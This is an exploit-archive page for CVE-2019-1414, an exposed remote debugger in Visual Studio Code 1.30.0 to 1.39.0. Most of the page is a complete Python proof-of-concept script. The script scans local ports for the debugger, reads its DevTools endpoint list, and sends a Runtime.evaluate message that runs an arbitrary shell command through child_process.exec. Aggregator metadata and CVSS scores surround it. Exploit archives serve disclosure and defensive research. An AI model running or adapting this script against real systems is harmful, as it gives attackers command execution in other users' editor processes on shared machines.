📄 Visual Studio 1.39.0 Remote Debugger

🗓️ 05 Dec 2025 00:00:00Reported by indoushkaType

packetstorm🔗 packetstorm.news👁 142 Views

Vulnerability in Visual Studio Code remote debugger versions 1.30.0 to 1.39.0 allows local access to the debugger.

Reporter	Title	Published	Views	Family All 14
ATTACKERKB	CVE-2019-1414	24 Jan 202000:00	–	attackerkb
Circl	CVE-2019-1414	4 Nov 201916:58	–	circl
CNVD	Microsoft Visual Studio Code Privilege Vulnerability	10 Feb 202000:00	–	cnvd
CVE	CVE-2019-1414	24 Jan 202020:50	–	cve
Cvelist	CVE-2019-1414	24 Jan 202020:50	–	cvelist
EUVD	EUVD-2019-9971	7 Oct 202500:30	–	euvd
Kaspersky	KLA11585 Visual Studio Code Elevation of Privilege Vulnerability	17 Oct 201900:00	–	kaspersky
Microsoft CVE	Visual Studio Code Elevation of Privilege Vulnerability	17 Oct 201907:00	–	mscve
NVD	CVE-2019-1414	24 Jan 202021:15	–	nvd
OSV	CVE-2019-1414	24 Jan 202021:15	–	osv

=============================================================================================================================================
    | # Title     : Visual Studio 1.30.0 → 1.39.0 Remote Debugger Exploit                                                                       |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits)                                                            |
    | # Vendor    : https://code.visualstudio.com/                                                                                              |
    =============================================================================================================================================
    
    [+] References : https://packetstorm.news/files/id/210646/ & CVE-2019-1414 https://packetstorm.news/download/210646
    
    [+] Summary : vulnerability in Visual Studio Code affecting versions 1.30.0 through 1.39.0. 
                  In these versions, the remote debugger (Node.js Debug Listener) was enabled by default and listened on a local TCP port without proper restrictions. This allowed any untrusted local user to:
                  Enumerate the listening port Connect to the debugger endpoint Access the internal DevTools JSON API
                  Interact with the running VS Code process Potentially escape sandboxes or manipulate the editor environment
                  The issue was discovered and reported by Tavis Ormandy (Google Project Zero). 
    			  Microsoft patched the vulnerability in Visual Studio Code 1.39.1, disabling the debug listener by default and improving access restrictions.
                  Affected users should upgrade to the patched version or later to avoid unauthorized debugger access by local users.
    
    [+]  POC : python poc.py
    
    #!/usr/bin/env python3
    """
    VS Code Remote Debugger Exploit
    by indoushka
    CVE-2019-1414 (or similar - this was patched in later versions)
    """
    
    import requests
    import json
    import websocket
    import sys
    import subprocess
    import threading
    from urllib.parse import urlparse
    
    def find_vscode_debug_ports():
        """Find potential VS Code debugger ports"""
        ports = []
        try:
            # Try netstat approach
            result = subprocess.run(['netstat', '-4nlt'], capture_output=True, text=True)
            for line in result.stdout.split('\n'):
                if 'LISTEN' in line and '127.0.0.1' in line:
                    parts = line.split()
                    if len(parts) > 3:
                        addr = parts[3]
                        if '127.0.0.1:' in addr:
                            port = addr.split(':')[-1]
                            ports.append(int(port))
        except:
            pass
        
        # Common VS Code debug ports range
        common_ports = list(range(59000, 65535))
        return ports + common_ports
    
    def check_debugger_endpoint(port):
        """Check if this port has VS Code debugger"""
        try:
            response = requests.get(f'http://localhost:{port}/json/list', timeout=2)
            if response.status_code == 200:
                data = response.json()
                if data and len(data) > 0:
                    return data
        except:
            pass
        return None
    
    def exploit_websocket(ws_url, command):
        """Execute command through WebSocket debug interface"""
        try:
            # Connect to WebSocket
            ws = websocket.create_connection(ws_url)
            
            # Debugger protocol messages to execute command
            setup_messages = [
                {
                    "id": 1,
                    "method": "Runtime.evaluate",
                    "params": {
                        "expression": f"require('child_process').exec('{command}', (error, stdout, stderr) => {{ console.log(stdout); }})",
                        "includeCommandLineAPI": True,
                        "silent": False,
                        "returnByValue": False
                    }
                }
            ]
            
            for msg in setup_messages:
                ws.send(json.dumps(msg))
                response = ws.recv()
                print(f"[+] Response: {response}")
                
            ws.close()
            return True
        except Exception as e:
            print(f"[-] WebSocket exploit failed: {e}")
            return False
    
    def main():
        print("[*] VS Code Remote Debugger Exploit PoC")
        print("[*] Scanning for debugger endpoints...")
        
        # Find potential ports
        ports = find_vscode_debug_ports()
        print(f"[*] Checking {len(ports)} potential ports...")
        
        vulnerable_endpoints = []
        
        for port in ports[:100]:  # Limit to first 100 ports for speed
            sys.stdout.write(f"\r[*] Checking port {port}...")
            sys.stdout.flush()
            
            endpoints = check_debugger_endpoint(port)
            if endpoints:
                print(f"\n[+] Found debugger on port {port}!")
                vulnerable_endpoints.extend(endpoints)
        
        if not vulnerable_endpoints:
            print("\n[-] No vulnerable debug endpoints found")
            return
        
        print(f"\n[+] Found {len(vulnerable_endpoints)} vulnerable endpoint(s)")
        
        for endpoint in vulnerable_endpoints:
            print(f"\n[+] Target: {endpoint.get('title', 'Unknown')}")
            print(f"    Type: {endpoint.get('type', 'Unknown')}")
            print(f"    WebSocket: {endpoint.get('webSocketDebuggerUrl', 'N/A')}")
            
            # Test with a simple command
            ws_url = endpoint.get('webSocketDebuggerUrl')
            if ws_url:
                # Replace with your test command
                test_command = "whoami > /tmp/vscode_poc.txt && echo 'Exploit successful'"
                if sys.platform == "win32":
                    test_command = "whoami > C:\\temp\\vscode_poc.txt && echo Exploit successful"
                
                print(f"[*] Attempting to execute: {test_command}")
                if exploit_websocket(ws_url, test_command):
                    print("[+] Command execution attempted!")
                else:
                    print("[-] Command execution failed")
    
    if __name__ == "__main__":
        main()
    	
    	
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================

05 Dec 2025 00:00Current

7.1High risk

Vulners AI Score7.1

CVSS 27.2

CVSS 3.17.8

EPSS0.00526